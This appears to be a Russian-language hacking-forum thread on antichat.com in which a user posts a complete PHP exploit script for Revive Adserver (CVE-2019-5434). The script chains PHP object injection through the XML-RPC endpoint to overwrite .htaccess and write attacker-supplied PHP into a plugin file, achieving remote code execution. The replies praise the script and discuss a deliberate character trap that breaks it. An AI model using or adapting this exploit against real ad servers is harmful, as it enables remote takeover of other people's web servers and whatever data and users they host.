Revive Adserver

Discussion in 'Веб-уязвимости' started by crlf, 2 Dec 2019.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    557
    Likes Received:
    1,052
    Reputations:
    356
    Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434)

    PHP:
    <?php
    # Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434)
    # coded by @crlf, with love for antichat.com
    # special thanks to @Kaimi :)
    # the script should be used only for educational purposes!

    namespace{
      (!isset(
    $argv[2]) ? exit(message('php '.basename(__FILE__).' https://example.com/adserver-dir/ \'<?php phpinfo(); ?>\'')) : @list($x$url$code) = $argv);

      
    $source 'data:text/html;base64,'.base64_encode('#');
      
    $destination 'plugins/.htaccess';
      
    #$destination = 'var/.htaccess';

      
    if(!strpos(request($url$source$destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));

      
    $source 'data:text/html;base64,'.base64_encode($code);
      
    $destination 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
      
    #$destination = 'var/default.conf.php';

      
    request($url$source$destination);
      
    message('check '.$url.$destination);

      function 
    request($url$source$destination){

        
    $what serialize(
             [
    'what' =>
                new 
    Pdp\Uri\Url(
                    new 
    League\Flysystem\File$destination,
                        new 
    League\Flysystem\File'x://'.$source,
                            new 
    League\Flysystem\MountManager(
                                new 
    League\Flysystem\Filesystem(
                                    new 
    League\Flysystem\Config,
                                    new 
    League\Flysystem\Adapter\Local('')
                                ),
                                new 
    League\Flysystem\Plugin\ForcedCopy
                            
    )
                        )
                    )
                )
             ]
         );

        
    $what str_replace(['\Uri\Url\00'],['\5CUri\5CUrl\00'], str_replace(['s:'сhr(0)],['S:''\\00'], $what));

        
    $xml '<?xml version="1.0" encoding="ISO-8859-1"?>
                  <methodCall>
                   <methodName>openads.spc</methodName>
                   <params>
                     <param>
                       <value>
                         <struct>
                           <member>
                             <name>remote_addr</name>
                             <value>8.8.8.8</value>
                           </member>
                           <member>
                             <name>cookies</name>
                             <value>
                               <array>
                               </array>
                             </value>
                           </member>
                         </struct>
                       </value>
                     </param>
                     <param><value><string>'
    .$what.'</string></value></param>
                     <param><value><string>0</string></value></param>
                     <param><value><string>dsad</string></value></param>
                     <param><value><boolean>1</boolean></value></param>
                     <param><value><boolean>0</boolean></value></param>
                     <param><value><boolean>1</boolean></value></param>
                   </params>
                 </methodCall>'
    ;

        return 
    file_get_contents($url.'adxmlrpc.php'falsestream_context_create(
                                 [
    'http' =>
                                   [
    'method' => 'POST',
                                    
    'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
                                    
    'header' =>'Content-type: application/x-www-form-urlencoded',
                                    
    'content'=> $xml
                                    
    ]
                                 ])
               );
      }

      function 
    message($str){
         print 
    PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
      }
    }

    namespace 
    League\Flysystem\Plugin{
      class 
    ForcedCopy{}
    }

    namespace 
    League\Flysystem{
      class 
    Config{
        protected 
    $settings = [];
        public function 
    __construct(){
           
    $this->settings = ['disable_asserts' => true];
        }
      }
      class 
    Filesystem{
        protected 
    $adapter;
        protected 
    $config;
         public function 
    __construct($config,$adapter){
           
    $this->config $config;
           
    $this->adapter $adapter;
         }
      }
      class 
    MountManager{
        protected 
    $filesystems = [];
        protected 
    $plugins = [];
         public function 
    __construct($filesystem$handler){
           
    $this->filesystems = ['x' => $filesystem];
           
    $this->plugins = ['__toString' => $handler];
         }
      }
      class 
    File{
        protected 
    $path;
        protected 
    $filesystem;
        public function 
    __construct($path$obj){
          
    $this->filesystem $obj;
          
    $this->path $path;
        }
      }
    }

    namespace 
    League\Flysystem\Adapter{
      class 
    Local{
        protected 
    $pathPrefix;
        public function 
    __construct($prefix){
           
    $this->pathPrefix $prefix;
         }
      }
    }

    namespace 
    Pdp\Uri{
      class 
    Url{
        private 
    $host;
        public function 
    __construct($file){
          
    $this->host $file;
        }
      }
    }

     
    BabaDook, grimnir, CyberTro1n and 4 others like this.
  2. specialk

    specialk New Member

    Joined:
    1 Jul 2010
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Вот уж не ожидал, сколько лет уже небыло рце под екс-опенх продукты.
     
    CyberTro1n likes this.
  3. lusterx

    lusterx New Member

    Joined:
    15 Dec 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    отличная работа, но она выдает ошибку при запуске скрипта function char(0)
     
  4. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    557
    Likes Received:
    1,052
    Reputations:
    356
    В скрипте присутствует защита от дурака :)
     
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    Ты опять зеро деи раздаёшь